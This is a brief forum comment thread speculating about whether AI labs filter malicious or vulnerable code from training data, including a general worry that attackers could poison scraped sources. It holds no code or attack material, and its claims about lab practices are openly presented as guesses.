upvote
Everyone’s (well, except Anthropic, they seem to have preserved a bit of taste) approach is the more data the better, so the databases of stolen content (erm, models) are memorizing crap.
reply
This was a compromise of the library owners github acccounts apparently, so this is not a related scenario to dangerous code in the training data.

I assume most labs don't do anything to deal with this, and just hope that it gets trained out because better code should be better rewarded in theory?

reply
By betting that it dilutes away and not worrying about it too much. Bit like dropping radioactive barrels into the deep ocean.
reply
Yeah, and that won't hold up for long. Just wait until some well resourced attacker replicates their exploit into tens of thousands of sources it knows will be scraped and included in the training set to bias the model to produce their vulnerable code. Only a matter of time.
reply
I am pretty sure that such measures aren't taken by AI companies, though I may be wrong.
reply
The API/online model inference definitely runs through some kind of edge safeguarding models which could do this.
reply